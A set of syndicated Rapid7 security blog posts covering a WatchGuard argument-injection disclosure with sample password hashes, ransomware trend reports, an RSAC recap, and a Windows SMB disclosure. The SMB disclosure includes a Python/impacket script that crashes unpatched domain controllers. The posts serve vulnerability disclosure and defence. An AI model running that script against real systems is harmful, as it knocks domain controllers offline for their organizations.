In February 2022, GreyNoise and CISA published details of WatchGuard appliances vulnerable to CVE-2022-26318 being exploited in the wild. Rapid7 discovered CVE-2022-31749 while analyzing the WatchGuard XTM appliance for the writeup of CVE-2022-26318 on AttackerKB.

Credit

This issue was discovered by Jake Baines of Rapid7, and it is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Vulnerability details

CVE-2022-31749 is an argument injection into the ftpput and ftpget commands. The arguments are injected when the SSH CLI prompts the attacker for a username and password when using the diagnose or import pac commands. For example:

WG>diagnose to ftp://test/test
Name: username
Password: 

The “Name” and “Password” values are not sanitized before they are combined into the “ftpput” and “ftpget” commands and executed via librmisvc.so. Execution occurs using execle, so command injection isn’t possible, but argument injection is. Using this injection, an attacker can upload and download arbitrary files.
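
To see why execle blocks command injection but still permits argument injection, consider the following sketch. It is not WatchGuard’s actual code: the command-line template and the injected option name are placeholders, and only the string handling is meant to mirror the pattern described above.

# Illustration of the bug class only; ftpget's real options are not modeled.
name     = 'alice --option-of-my-choosing'  # attacker's answer to "Name:"
password = 'secret'                         # attacker's answer to "Password:"

argv = "ftpget -u #{name} -p #{password} host remote_file".split(' ')
p argv
# => ["ftpget", "-u", "alice", "--option-of-my-choosing", "-p", "secret",
#     "host", "remote_file"]

# Executing argv directly (analogous to execle, with no shell in between)
# keeps metacharacters such as ';' literal, so command injection fails, but
# the extra token above still reaches ftpget as an attacker-chosen argument.
# system(*argv)   # left commented out on purpose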

File writing turns out to be less useful than an attacker would hope. The problem, from an attacker’s point of view, is that WatchGuard has locked down much of the file system, and the user can only modify a few directories: /tmp/, /pending/, and /var/run. At the time of writing, we don’t see a way to escalate the file write into code execution, though we wouldn’t rule it out as a possibility.

The low-privileged user file read is interesting because WatchGuard has a built-in low-privileged user named status. This user is intended to have “read-only” access to the system. In fact, historically speaking, the default password for this user was “readonly”. Using CVE-2022-31749, this low-privileged user can exfiltrate the configd-hash.xml file, which contains user password hashes when Firebox-DB is in use. Example:

<?xml version="1.0"?>
<users>
  <version>3</version>
  <user name="admin">
    <enabled>1</enabled>
    <hash>628427e87df42adc7e75d2dd5c14b170</hash>
    <domain>Firebox-DB</domain>
    <role>Device Administrator</role>
  </user>
  <user name="status">
    <enabled>1</enabled>
    <hash>dddbcb37e837fea2d4c321ca8105ec48</hash>
    <domain>Firebox-DB</domain>
    <role>Device Monitor</role>
  </user>
  <user name="wg-support">
    <enabled>0</enabled>
    <hash>dddbcb37e837fea2d4c321ca8105ec48</hash>
    <domain>Firebox-DB</domain>
    <role>Device Monitor</role>
  </user>
</users>

The hashes are just unsalted MD4 hashes. @funoverip wrote about cracking these weak hashes using Hashcat all the way back in 2013.

Exploitation

Rapid7 has published a proof of concept that exfiltrates the configd-hash.xml file via the diagnose command. The following video demonstrates its use against WatchGuard XTMv 12.1.3 Update 8.



CVE-2022-31749: WatchGuard Authenticated Arbitrary File Read/Write (Fixed)

Remediation

Apply the WatchGuard Fireware updates. If possible, remove internet access to the appliance’s SSH interface. Out of an abundance of caution, changing passwords after updating is a good idea.

Vendor statement

WatchGuard thanks Rapid7 for their quick vulnerability report and willingness to work through a responsible disclosure process to protect our customers. We always appreciate working with external researchers to identify and resolve vulnerabilities in our products and we take all reports seriously. We have issued a resolution for this vulnerability, as well as several internally discovered issues, and advise our customers to upgrade their Firebox and XTM products as quickly as possible. Additionally, we recommend all administrators follow our published best practices for secure remote management access to their Firebox and XTM devices.

Disclosure timeline

March, 2022: Discovered by Jake Baines of Rapid7
Mar 29, 2022: Reported to WatchGuard via support phone, issue assigned case number 01676704.
Mar 29, 2022: WatchGuard acknowledged the follow-up email.
April 20, 2022: Rapid7 followed up, asking for progress.
April 21, 2022: WatchGuard acknowledged again they were researching the issue.
May 26, 2022: Rapid7 checked in on status of the issue.
May 26, 2022: WatchGuard indicates patches should be released in June, and asks about CVE assignment.
May 26, 2022: Rapid7 assigns CVE-2022-31749
June 23, 2022: This disclosure

New Report Shows What Data Is Most at Risk to (and Prized by) Ransomware Attackers

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/06/16/new-report-shows-what-data-is-most-at-risk-to-and-prized-by-ransomware-attackers/

New Report Shows What Data Is Most at Risk to (and Prized by) Ransomware Attackers

Ransomware is one of the most pressing and diabolical threats faced by cybersecurity teams today. Gaining access to a network and holding that data for ransom has caused billions in losses across nearly every industry and around the world. It has stopped critical infrastructure like healthcare services in its tracks, putting the lives and livelihoods of many at risk.

In recent years, threat actors have upped the ante by using “double extortion” as a way to inflict maximum pain on an organization. Through this method, not only are threat actors holding data hostage for money – they also threaten to release that data (either publicly or for sale on dark web outlets) to extract even more money from companies.

At Rapid7, we often say that when it comes to ransomware, we may all be targets, but we don’t all have to be victims. We have means and tools to mitigate the impact of ransomware — and one of the most important assets we have on our side is data about ransomware attackers themselves.

Reports about trends in ransomware are pretty common these days. But what isn’t common is information about what kinds of data threat actors prefer to collect and release.

A new report from Rapid7’s Paul Prudhomme uses proprietary data collection tools to analyze the disclosure layer of double-extortion ransomware attacks. He identified the types of data attackers initially disclose to coerce victims into paying ransom, determined trends across industries, and released the findings in a first-of-its-kind analysis.

“Pain Points: Ransomware Data Disclosure Trends” reveals a story of how ransomware attackers think, what they value, and how they approach applying the most pressure on victims to get them to pay.

The report looks at all ransomware data disclosure incidents reported to customers through our Threat Command threat intelligence platform (TIP). It also incorporates threat intelligence coverage and Rapid7’s institutional knowledge of ransomware threat actors.

From this, we were able to determine:

  • The most common types of data attackers disclosed in some of the most highly affected industries, and how they differ
  • How leaked data differs by threat actor group and target industry
  • The current state of the ransomware market share among threat actors, and how that has changed over time

Finance, pharma, and healthcare

Overall, trends in ransomware data disclosures pertaining to double extortion varied slightly, except in a few key verticals: pharmaceuticals, financial services, and healthcare. In general, financial data was leaked most often (63%), followed by customer/patient data (48%).

However, in the financial services sector, customer data was leaked most of all, rather than financial data from the firms themselves. Some 82% of disclosures linked to the financial services sector were of customer data. Internal company financial data, which was the most exposed data in the overall sample, made up just 50% of data disclosures in the financial services sector. Employees’ personally identifiable information (PII) and HR data were more prevalent, at 59%.

In the healthcare and pharmaceutical sectors, internal financial data was leaked some 71% of the time, more than any other industry — even the financial services sector itself. Customer/patient data also appeared with high frequency, having been released in 58% of disclosures from the combined sectors.

One thing that stood out about the pharmaceutical industry was the propensity of threat actors to release intellectual property (IP) files. In the overall sample, just 12% of disclosures included IP files, but in the pharma industry, 43% of all disclosures included IP. This is likely due to the high value placed on research and development within this industry.

The state of ransomware actors

One of the more interesting results of the analysis was a clearer understanding of the state of ransomware threat actors. It’s always critical to know your enemy, and with this analysis, we can pinpoint the evolution of ransomware groups, what data the individual groups value for initial disclosures, and their prevalence in the “market.”

For instance, between April and December 2020, the now-defunct Maze ransomware group was responsible for 30% of data disclosures. This “market share” was only slightly lower than that of the next two most prevalent groups combined (REvil/Sodinokibi at 19% and Conti at 14%). However, the demise of Maze in November of 2020 saw many smaller actors stepping in to take its place. Conti and REvil/Sodinokibi swapped places (19% and 15%, respectively), barely making up for the shortfall left by Maze. The top five groups in 2021 made up just 56% of all attacks, with a variety of smaller, lesser-known groups being responsible for the rest.

Recommendations for security operations

While there is no silver bullet for the ransomware problem, there are silver linings in the form of best practices that can help protect against ransomware threat actors and minimize the damage should they strike. This report offers several that are aimed at double extortion, including:

  • Going beyond backing up data and including strong encryption and network segmentation
  • Prioritizing certain types of data for extra protection, particularly in fields where threat actors specifically seek out that data in order to hit those organizations the hardest
  • Understanding that certain industries are going to be targets of certain types of leaks, and ensuring that customers, partners, and employees understand the heightened risk of disclosures of those types of data and are prepared for them

To get more insights and view some (well redacted) real-world examples of data breaches, check out the full paper.

Complimentary GartnerⓇ Report “How to Respond to the 2022 Cyberthreat Landscape”: Ransomware Edition

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/06/15/complimentary-gartner-report-how-to-respond-to-the-2022-cyberthreat-landscape-ransomware-edition/

Complimentary GartnerⓇ Report

First things first — if you’re a member of a cybersecurity team bouncing from one stressful “identify vulnerability, patch, repeat” cycle to another, claim your copy of the GartnerⓇ report “How to Respond to the 2022 Cyberthreat Landscape” right now. It will help you understand the current landscape and better plan for what’s happening now and in the near term.

Ransomware is on the tip of every security professional’s tongue right now, and for good reason. It’s growing, spreading, and evolving faster than many organizations can keep up with. But just because we may all be targets doesn’t mean we have to be victims.

The analysts at Gartner have taken a good, long look at the latest trends in security, with a particular eye toward ransomware, and they had this to say about attacker trends in their report.

Expect attackers to:

  • “Diversify their targets by pursuing lower-profile targets more frequently, using smaller attacks to avoid attention from well-funded nation states.”
  • “Attack critical CPS, particularly when motivated by geopolitical tensions and aligned ransomware actors.”
  • “Optimize ransomware delivery by using ‘known good’ cloud applications, such as enterprise productivity software as a service (SaaS) suites, and using encryption to hide their activities.”
  • “Target individual employees, particularly those working remotely using potentially vulnerable remote access services like Remote Desktop Protocol (RDP) services, or simply bribe employees for access to organizations with a view to launching larger ransomware campaigns.”
  • “Exfiltrate data as part of attempts to blackmail companies into paying ransom or risk data breach disclosure, which may result in regulatory fines and limits the benefits of the traditional mitigation method of ‘just restore quickly.'”
  • “Combine ransomware with other techniques, such as distributed denial of service (DDoS) attacks, to force public-facing services offline until organizations pay a ransom.”

Ransomware is most definitely considered a “top threat,” and it has moved beyond being just an IT problem to one that involves governments around the globe. Attackers recognize that the game got a lot bigger with well-funded nations joining the fray to combat it, so their tactics will be targeted, small, diverse, and more frequent to avoid poking the bear(s). Expect to see smaller organizations targeted more often, frequently as part of ransomware-as-a-service campaigns.

Gartner also says that attackers will use RaaS to attack critical infrastructure like cyber-physical systems (CPS) more frequently:

“Attackers will aim at smaller targets and deliver ‘ransomware as a service’ to other groups. This will enable more targeted and sophisticated attacks, as the group targeting an organization will have access to ransomware developed by a specialist group. Attackers will also target critical assets, such as CPS.”

Mitigating ransomware

But there are things we can do to mitigate ransomware attacks and push back against the attackers. Gartner suggests several key recommendations, including:

  • “Construct a pre-incident strategy that includes backup (including a restore test), asset management, and restriction of user privileges.”
  • “Build post-incident response procedures by training staff and scheduling regular drills.”
  • “Expand the scope of ransomware protection programs to CPS.”
  • “Increase cross-team training for the nontechnical aspects of a ransomware incident.”
  • “Remember that payment of a ransom does not guarantee erasure of exfiltrated data, full recovery of encrypted data, or immediate restoration of operations.”
  • “Don’t rely on cyber insurance only. There is frequently a disconnect between what executive leaders expect a cybersecurity insurance policy to cover and what it actually does cover.”

At Rapid7, we have the risk management, detection and response, and threat intelligence tools your organization needs not only to keep up with the evolution of ransomware threat actors, but also to implement industry best practices.

If you want to learn more about what cybersecurity threats are out there now and on the horizon, check out the complimentary Gartner report.

Gartner, How to Respond to the 2022 Cyberthreat Landscape, 1 April 2022, by Jeremy D’Hoinne, John Watts, Katell Thielemann

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/06/14/cve-2022-32230-windows-smb-denial-of-service-vulnerability-fixed/

A remote and unauthenticated attacker can trigger a denial-of-service condition on Microsoft Windows Domain Controllers by leveraging a flaw that leads to a null pointer dereference within the Windows kernel. We believe this vulnerability would be scored as CVSSv3 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, or 7.5. This vulnerability was silently patched by Microsoft in April of 2022 in the same batch of changes that addressed the unrelated CVE-2022-24500 vulnerability.

Credit

This issue was fixed by Microsoft without disclosure in April 2022, but because it was originally classed as a mere stability bug fix, it did not go through the usual security issue process. In May, Spencer McIntyre of Rapid7 discovered this issue while researching the fix for CVE-2022-24500 and determined the security implications of CVE-2022-32230. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

CVE-2022-32230 is caused by a missing check in srv2!Smb2ValidateVolumeObjectsMatch to verify that a pointer is not null before reading a PDEVICE_OBJECT from it and passing it to IoGetBaseFileSystemDeviceObject. The following patch diff shows the function in question for Windows 10 21H2 (unpatched version 10.0.19041.1566 on the left).

[Image: patch diff of srv2!Smb2ValidateVolumeObjectsMatch, with the unpatched build 10.0.19041.1566 on the left]

This function is called from the dispatch routine for an SMB2 QUERY_INFO request of the FILE_INFO / FILE_NORMALIZED_NAME_INFORMATION class. Per the docs in MS-SMB2 section 3.3.5.20.1 Handling SMB2_0_INFO_FILE, FILE_NORMALIZED_NAME_INFORMATION is only available when the dialect is 3.1.1.

For FileNormalizedNameInformation information class requests, if not supported by the server implementation<392>, or if Connection.Dialect is "2.0.2", "2.1" or "3.0.2", the server MUST fail the request with STATUS_NOT_SUPPORTED.

To trigger this code path, a user would open any named pipe from the IPC$ share and make a QUERY_INFO request for the FILE_NORMALIZED_NAME_INFORMATION class. This typically requires user permissions or a non-default configuration enabling guest access. Domain controllers are a noteworthy exception, however: they expose multiple named pipes, such as netlogon, that can be opened anonymously. The srvsvc pipe is an alternative, though it typically does require permissions.

Under normal circumstances, the FILE_NORMALIZED_NAME_INFORMATION class would be used to query the normalized name information of a file that exists on disk. This differs from the exploitation scenario which queries a named pipe.

A system that has applied the patch for this vulnerability will respond to the request with the error STATUS_NOT_SUPPORTED.
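
For readers who want to see the message flow end to end, the sketch below reconstructs the request sequence described above using Python and the impacket library. It is not the Rapid7 Metasploit module: the target hostname is hypothetical, impacket's lower-level SMB3 queryInfo helper and its constants may differ between versions, and it should only ever be pointed at systems you own, since an unpatched domain controller will crash.

from impacket.smbconnection import SMBConnection
from impacket.smb3structs import SMB2_0_INFO_FILE

TARGET = 'dc01.example.local'            # hypothetical domain controller
PIPE = 'netlogon'                        # can be opened anonymously on domain controllers
FILE_NORMALIZED_NAME_INFORMATION = 48    # information class number from MS-FSCC

# Negotiate SMB (3.1.1 against modern Windows) and establish a null session.
conn = SMBConnection(TARGET, TARGET, sess_port=445)
conn.login('', '')

# Open the named pipe through the IPC$ share.
tree_id = conn.connectTree('IPC$')
file_id = conn.openFile(tree_id, PIPE)

# Send the QUERY_INFO request for the FileNormalizedNameInformation class.
# A patched server answers with STATUS_NOT_SUPPORTED; an unpatched domain
# controller dereferences a null pointer in the kernel and bugchecks.
smb3 = conn.getSMBServer()
try:
    smb3.queryInfo(tree_id, file_id,
                   infoType=SMB2_0_INFO_FILE,
                   fileInfoClass=FILE_NORMALIZED_NAME_INFORMATION)
    print('Request completed without error')
except Exception as err:
    # Patched targets surface STATUS_NOT_SUPPORTED here; a vulnerable target
    # typically drops the connection as it crashes.
    print('Server responded with: %s' % err)

conn.close()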

Proof of concept

A proof-of-concept Metasploit module is available on GitHub. It requires Metasploit version 6.2 or later.

Impact

The most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition. Given the current state of the art of exploitation, it is assumed that a null pointer dereference in the Windows kernel is not remotely exploitable for the purpose of arbitrary code execution without combining it with another, unrelated vulnerability.

In the default configuration, Windows will automatically restart after a BSOD.

Remediation

It is recommended that system administrators apply the official patches provided by Microsoft in their April 2022 update. If that is not possible, restricting access and disabling SMB version 3 can help remediate this flaw.

Disclosure timeline

April 12th, 2022 – Microsoft patches CVE-2022-32230
April 29th, 2022 – Rapid7 finds and confirms the vulnerability while investigating CVE-2022-24500
May 4th, 2022 – Rapid7 contacts MSRC to clarify confusion regarding CVE-2022-32230
May 18th, 2022 – Microsoft responds to Rapid7, confirming that the vulnerability now identified as CVE-2022-32230 is different from the disclosed vulnerability CVE-2022-24500 with which it was patched
June 1st, 2022 – Rapid7 reserves CVE-2022-32230 after discussing with Microsoft
June 14th, 2022 – Rapid7 releases details in this disclosure, and Microsoft publishes its advisory

Defending Against Tomorrow’s Threats: Insights From RSAC 2022

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/06/13/defending-against-tomorrows-threats-insights-from-rsac-2022/

The rapid pace of change in the cyberthreat landscape is on every security pro’s mind. Not only do organizations need to secure complex cloud environments, but they’re also more aware than ever that their software supply chains and the open-source elements of their application codebases might not be as ironclad as they thought.

It should come as no surprise, then, that defending against a new slate of emerging threats was a major theme at RSAC 2022. Here’s a closer look at what some Rapid7 experts who presented at this year’s RSA conference in San Francisco had to say about staying ahead of attackers in the months to come.

Surveying the threat landscape

Security practitioners often turn to Twitter for the latest news and insights from peers. As Raj Samani, SVP and Chief Data Scientist, and Lead Security Researcher Spencer McIntyre pointed out in their RSA talk, “Into the Wild: Exploring Today’s Top Threats,” the trend holds true when it comes to emerging threats.

“For many people, identifying threats is actually done through somebody that I follow on Twitter posting details about a particular vulnerability,” said Raj.

As Spencer noted, security teams need to be able to filter all these inputs and identify the actual priorities that require immediate patching and remediation. And that’s where the difficulty comes in.

“How do you manage a patching strategy when there are critical vulnerabilities coming out … it seems weekly?” Raj asked. “Criminals are exploiting these vulnerabilities literally in days, if that,” he continued.

Indeed, the average time to exploit — i.e., the interval between a vulnerability being discovered by researchers and clear evidence of attackers using it in the wild — plummeted from 42 days in 2020 to 17 days in 2021, as noted in Rapid7’s latest Vulnerability Intelligence Report. With so many threats emerging at a rapid clip and so little time to react, defenders need the tools and expertise to understand which vulnerabilities to prioritize and how attackers are exploiting them.

“Unless we get a degree of context and an understanding of what’s happening, we’re going to end up ignoring many of these vulnerabilities because we’ve just got other things to worry about,” said Raj.

The evolving threat of ransomware

One of the things that worry security analysts, of course, is ransomware — and as the threat has grown in size and scope, the ransomware market itself has changed. Cybercriminals are leveraging this attack vector in new ways, and defenders need to adapt their strategies accordingly.

That was the theme that Erick Galinkin, Principal AI Researcher, covered in his RSA talk, “How to Pivot Fast and Defend Against Ransomware.” Erick identified four emerging ransomware trends that defenders need to be aware of:

  • Double extortion: In this type of attack, threat actors not only demand a ransom for the data they’ve stolen and encrypted but also extort organizations for a second time — pay an additional fee, or they’ll leak the data. This means that even if you have backups of your data, you’re still at risk from this secondary ransomware tactic.
  • Ransomware as a service (RaaS): Not all threat actors know how to write highly effective ransomware. With RaaS, they can simply purchase malicious software from a provider, who takes a cut of the payout. The result is a broader and more decentralized network of ransomware attackers.
  • Access brokers: A kind of mirror image to RaaS, access brokers give a leg up to bad actors who want to run ransomware on an organization’s systems but need an initial point of entry. Now, that access is for sale in the form of phished credentials, cracked passwords, or leaked data.
  • Lateral movement: Once a ransomware attacker has infiltrated an organization’s network, they can use lateral movement techniques to gain a higher level of access and ransom the most sensitive, high-value data they can find.

With the ransomware threat growing by the day and attackers’ techniques growing more sophisticated, security pros need to adapt to the new landscape. Here are a few of the strategies Erick recommended for defending against these new ransomware tactics.

  • Continue to back up all your data, and protect the most sensitive data with strong admin controls.
  • Don’t get complacent about credential theft — the spoils of what may look like a run-of-the-mill phishing attack could be sold by an access broker as an entry point for ransomware.
  • Implement the principle of least privilege, so only administrator accounts can perform administrator functions — this will help make lateral movement easier to detect.

Shaping a new kind of SOC

With so much changing in the threat landscape, how should the security operations center (SOC) respond?

This was the focus of “Future Proofing the SOC: A CISO’s Perspective,” the RSA talk from Jeffrey Gardner, Practice Advisor for Detection and Response (D&R). In addition to the sprawling attack surface, security analysts are also experiencing a high degree of burnout, understandably overwhelmed by the sheer volume of alerts and threats. To alleviate some of the pressure, SOC teams need a few key things.

For Jeffrey, these needs are best met through a hybrid SOC model — one that combines internally owned SOC resources and staff with external capabilities offered through a provider, for a best-of-both-worlds approach. The framework for this approach is already in place, but the version that Jeffrey and others at Rapid7 envision involves some shifting of paradigms. These include:

  • Collapsing the distinction between product and service and moving toward “everything as a service,” with a unified platform that allows resources — everything from in-product features to provider expertise and guidance — to be delivered on a sliding scale
  • Ensuring full transparency, so the organization understands not only what’s going on in their own SOC but also in their provider’s, through the use of shared solutions
  • More customization, with workflows, escalations, and deliverables tailored to the customer’s needs

Meeting the moment

It’s critical to stay up to date with the most current vulnerabilities we’re seeing and the ways attackers are exploiting them — but to be truly valuable, those insights must translate into action. Defenders need strategies tailored to the realities of today’s threat landscape.

For our RSA 2022 presenters, that might mean going back to basics with consistent data backups and strong admin controls. Or it might mean going bold by fully reimagining the modern SOC. The techniques don’t have to be new or fancy to be effective — they simply have to meet the moment. (Although if the right tactics turn out to be big and game-changing, we’ll be as excited as the next security pro.)

Looking for more insights on how defenders can protect their organizations amid today’s highly dynamic threat landscape? You can watch these presentations — and even more from our Rapid7 speakers — at our library of replays from RSAC 2022.
